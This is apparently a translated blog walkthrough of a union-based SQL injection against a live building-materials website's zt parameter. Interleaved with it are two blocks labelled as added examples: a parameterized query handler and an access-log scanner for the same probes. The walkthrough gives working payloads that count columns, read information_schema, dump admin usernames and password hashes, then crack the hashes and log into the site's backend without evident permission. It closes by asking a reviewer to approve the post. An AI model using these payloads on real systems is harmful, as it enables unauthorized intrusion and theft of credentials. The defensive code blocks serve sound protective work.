Website: a building-materials website
When I put a double quote into the zt parameter, an error came back; let's look at the error message.
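The error on a stray double quote is the tell that zt is pasted straight into the SQL text. As an added example (not code from the original post or from the site it describes), here is a minimal search handler that treats both request parameters as data: zt is validated as a small integer before it goes anywhere near the query, and keyword is bound as a parameter with its LIKE wildcards escaped. The products table, its column names and the sample rows are constructed for this illustration; it runs on the standard-library sqlite3 module.

```python
import re
import sqlite3


class BadParameter(ValueError):
    """Raised when a request parameter does not have the expected shape."""


def build_db():
    # Constructed in-memory table standing in for the site's product listing.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, zt INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, 1, "cement"), (2, 1, "brick"), (3, 0, "tile")],
    )
    return conn


def parse_zt(raw):
    # zt is a status flag, so only a short integer is acceptable; anything
    # else (including "1 order by 50--+" or "-1 union select ...") is rejected
    # before any SQL is built.
    if not re.fullmatch(r"-?\d{1,3}", raw):
        raise BadParameter("zt must be a small integer")
    return int(raw)


def search(conn, keyword, zt_raw):
    """Return (id, name) rows matching the status flag and keyword."""
    zt = parse_zt(zt_raw)
    # Escape LIKE metacharacters so a user-supplied % or _ matches literally,
    # then bind the pattern as a parameter; quotes in keyword are just bytes.
    escaped = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    pattern = "%" + escaped + "%"
    return conn.execute(
        "SELECT id, name FROM products WHERE zt = ? AND name LIKE ? ESCAPE '\\'",
        (zt, pattern),
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(search(db, "cem", "1"))      # normal request
    print(search(db, '"', "1"))        # the double quote is now harmless
    try:
        search(db, "-1", "1 order by 50--+")
    except BadParameter as exc:
        print("rejected:", exc)
```

With this shape the ORDER BY column-counting step and the UNION SELECT step from the walkthrough both fail at parameter validation rather than reaching the database, and a double quote in keyword produces an empty result instead of a database error message.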
Column count
First, test how many columns there are:
keyword=-1&zt=1 order by 50--+
At 50 it errors, which means the column count is below 50; then bisect from there. 41 and 42 gave no error and 43 errored, so there are 42 columns in total.
Test which column is echoed in the error:
ord=-1&zt=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
The error shows 4, which means the fourth column is reflected in the error output and can be used to display results.
keyword=-1&zt=-1%20union%20select%201,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
Then put our function in the fourth column.
The error comes back straight away showing root privileges.
Then simply change user() to database().
The database name is dumped: jckj
version() gets its version number.
Dumping columns
keyword=-1&zt=-1%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20information_schema.tables%20where%20table_schema=%27jckj%27--+
Using the built-in information_schema database, the table names of the database can be injected out; because I had already dumped the database name as jckj via database(), it can be hard-coded.
But when I actually ran the dump, nothing was displayed; it did not recognise jckj. A small trick here: hex-encode it, writing "jckj" in hexadecimal.
keyword=-1&zt=-1%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20information_schema.tables%20where%20table_schema=0x6A636B6A--+
Then:
The tables were dumped successfully; what we definitely want to query is the admin table.
zt=-1%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20information_schema.columns%20where%20table_schema=0x6A636B6A%20and%20table_name=0x776B63785F61646D696E--+
Simple as that, it's out.
Since we now know the table, after injecting it out we change the query to read the wkcx_admin table directly, and query admin_name and admin_pwd directly:
zt=-1%20union%20select%201,2,3,group_concat(admin_name,0x3a,admin_pwd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27.28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20wkcx_admin--+
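Every step of the walkthrough above leaves a distinctive trace in the web server access log: an ORDER BY probe with a bare number, a UNION SELECT with a long list of placeholders, reads from information_schema, a trailing comment, and hex literals standing in for string values (the 0x6A636B6A trick). As an added example, not part of the original post, the following scanner flags those patterns in request lines and decodes the hex literals so an analyst can see which schema and table the probe asked for. The log lines are constructed for this example, with a made-up path and client addresses; the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from any real server). The second and
# third mirror the column-count probe and the information_schema read above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /list.php?keyword=cement&zt=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /list.php?keyword=-1&zt=1%20order%20by%2043--+ HTTP/1.1" 500 120',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /list.php?keyword=-1&zt=-1%20union%20select%201,2,3,'
    'group_concat(table_name),5%20from%20information_schema.tables%20where%20table_schema=0x6A636B6A--+ HTTP/1.1" 200 900',
]

# Each rule matches one of the probing techniques shown in the walkthrough.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_read": re.compile(r"\binformation_schema\.", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),
    # "--+" arrives as "-- " once the query string is URL-decoded.
    "comment_tail": re.compile(r"(--\+|--\s|#)\s*$"),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]{2,})\b", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) ')


def decode_hex_literals(query):
    """Return printable ASCII decodings of 0x... literals found in a query string."""
    decoded = []
    for digits in HEX_LITERAL.findall(query):
        try:
            text = bytes.fromhex(digits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # odd length or not text: leave it alone
        if text.isprintable():
            decoded.append(text)
    return decoded


def analyze(line):
    """Return a finding dict for a suspicious request line, else None."""
    match = REQUEST_LINE.search(line)
    if not match:
        return None
    url = match.group(1)
    # Decode once so encoded spaces and the "+" in "--+" become plain characters.
    query = unquote_plus(url.partition("?")[2])
    hits = [name for name, rule in RULES.items() if rule.search(query)]
    if not hits:
        return None
    return {
        "client": line.split()[0],
        "hits": hits,
        "decoded": decode_hex_literals(query),
    }


def scan(lines):
    """Run analyze() over every line and keep only the findings."""
    return [finding for finding in map(analyze, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Decoding the hex literals is what turns a generic "union select" alert into something actionable: the third sample line resolves to the schema name jckj, and a later request carrying 0x776B63785F61646D696E would resolve to wkcx_admin, telling the responder exactly which table was targeted. A 500 status paired with an order_by_probe hit is also the signature of the column-count bisection described above.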
Summary
OK, simple as that, it's out.
It's MD5, so let's crack it.
OK, cracked.
Backend shell obtained!
Try the credentials just cracked.
Login succeeds; injection complete!!!
---------- The data has been redacted; no private information is involved.
This was only for testing, and the platform has since gone through several versions. Reviewer, please let this one through.